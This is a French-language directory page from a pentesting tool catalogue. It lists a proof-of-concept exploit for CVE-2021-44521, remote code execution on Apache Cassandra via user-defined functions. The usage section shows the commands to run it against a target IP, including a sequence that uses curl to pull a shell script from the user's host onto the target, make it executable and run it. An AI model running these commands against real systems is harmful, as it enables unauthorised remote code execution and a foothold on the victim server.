Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44521 — Exploit automatisé de preuve de concept pour CVE-2021-44521, permettant l'exécution de code à distance sur Apache Cassandra via des fonctions définies par l'utilisateur. Exécute des commandes arbitraires sur l'adresse IP cible. | Kitploit
Outils/GitHubGitHub/woodenklaas/cve-2021-44521
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCheval de Troie d'Accès à Distance
GitHubwoodenklaas/cve-2021-44521

CVE-2021-44521

Exploit automatisé de preuve de concept pour CVE-2021-44521, permettant l'exécution de code à distance sur Apache Cassandra via des fonctions définies par l'utilisateur. Exécute des commandes arbitraires sur l'adresse IP cible.

Voir le dépôt
10233il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44521

PoC automatisé de la CVE-2021-44521 Crédits au PoC original : https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/

Prérequis

Cassandra-driver

root@kitploit:~
pip3 install cassandra-driver

Utilisation

root@kitploit:~
python3 poc.py <ip> <cmd>

Notez que vous ne pouvez pas exécuter plusieurs commandes à la fois, ni utiliser de pipes pour le moment. Exécutez donc

root@kitploit:~
pyhon3 poc.py <ip> "curl http://<votre-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"
Télécharger l’outil